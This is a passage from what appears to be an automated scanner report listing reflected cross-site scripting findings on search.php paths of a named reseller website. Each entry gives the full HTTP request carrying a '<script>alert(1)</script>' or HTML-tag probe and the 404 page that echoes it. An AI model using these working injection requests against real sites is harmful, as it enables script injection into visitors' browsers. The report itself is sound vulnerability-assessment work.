Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a22ff<a>c8a637b9555 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/kosmos/images/rating/search.php?keyword=search...a22ff<a>c8a637b9555&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:03 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/rating/search.php?keyword=search...a22ff<a>c8a637b9555&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2606. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload f53c8<script>alert(1)</script>89d9ce54913 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&f53c8<script>alert(1)</script>89d9ce54913=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2&f53c8<script>alert(1)</script>89d9ce54913=1 was not found on this server.</p>
...[SNIP]...

2.2607. http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/rating/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload d0955<a>3143424d8f8 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d0955<a>3143424d8f8 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/rating/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:48 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/rating/search.php?keyword=search...&Submit3=Search&opt=2d0955<a>3143424d8f8 was not found on this server.</p>
...[SNIP]...

2.2608. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload dc7e8<script>alert(1)</script>9cdecde9986 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detaildc7e8<script>alert(1)</script>9cdecde9986/38/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detaildc7e8<script>alert(1)</script>9cdecde9986/38/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2609. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 59bd6<script>alert(1)</script>01f30bf0353 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/3859bd6<script>alert(1)</script>01f30bf0353/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:05 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/3859bd6<script>alert(1)</script>01f30bf0353/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2610. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload d2717<script>alert(1)</script>ecd553d6e73 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themesd2717<script>alert(1)</script>ecd553d6e73/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themesd2717<script>alert(1)</script>ecd553d6e73/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2611. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 8c2ec<script>alert(1)</script>419407653e8 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos8c2ec<script>alert(1)</script>419407653e8/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:29 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos8c2ec<script>alert(1)</script>419407653e8/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2612. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 638e5<script>alert(1)</script>0406d330f0d was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images638e5<script>alert(1)</script>0406d330f0d/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images638e5<script>alert(1)</script>0406d330f0d/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2613. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php [REST URL parameter 6] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 4d196<script>alert(1)</script>a7a5d58b9d1 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/search.php4d196<script>alert(1)</script>a7a5d58b9d1?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/search.php4d196<script>alert(1)</script>a7a5d58b9d1?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2614. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php [Submit3 parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 32332<a>28cb641e1be was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/kosmos/images/search.php?keyword=search...&Submit3=Search32332<a>28cb641e1be&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/search.php?keyword=search...&Submit3=Search32332<a>28cb641e1be&opt=2 was not found on this server.</p>
...[SNIP]...

2.2615. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php [keyword parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload 98fd8<a>413e484773d was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/kosmos/images/search.php?keyword=search...98fd8<a>413e484773d&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:08 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/search.php?keyword=search...98fd8<a>413e484773d&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2616. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 35650<script>alert(1)</script>1faa9c7416 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&35650<script>alert(1)</script>1faa9c7416=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&35650<script>alert(1)</script>1faa9c7416=1 was not found on this server.</p>
...[SNIP]...

2.2617. http://www.resellerbase.com/detail/38/themes/kosmos/images/search.php [opt parameter] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload fb503<a>1095d1eb1d7 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/38/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2fb503<a>1095d1eb1d7 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:13:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2fb503<a>1095d1eb1d7 was not found on this server.</p>
...[SNIP]...

2.2618. http://www.resellerbase.com/detail/38/themes/kosmos/search.php [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7f0b7<script>alert(1)</script>22129f024c5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7f0b7<script>alert(1)</script>22129f024c5/38/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:15:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7f0b7<script>alert(1)</script>22129f024c5/38/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2619. http://www.resellerbase.com/detail/38/themes/kosmos/search.php [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 6a88c<script>alert(1)</script>65e332ead2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/386a88c<script>alert(1)</script>65e332ead2/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:11 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/386a88c<script>alert(1)</script>65e332ead2/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2620. http://www.resellerbase.com/detail/38/themes/kosmos/search.php [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 5bcc5<script>alert(1)</script>76faf27eb94 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes5bcc5<script>alert(1)</script>76faf27eb94/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:22 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes5bcc5<script>alert(1)</script>76faf27eb94/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2621. http://www.resellerbase.com/detail/38/themes/kosmos/search.php [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 6fe4b<script>alert(1)</script>4321b55547a was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos6fe4b<script>alert(1)</script>4321b55547a/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/38/themes/kosmos6fe4b<script>alert(1)</script>4321b55547a/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2622. http://www.resellerbase.com/detail/38/themes/kosmos/search.php [REST URL parameter 5] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.resellerbase.com
Path:	/detail/38/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 8173a<script>alert(1)</script>9d02acca01c was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/38/themes/kosmos/search.php8173a<script>alert(1)</script>9d02acca01c?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/38/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:16:44 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
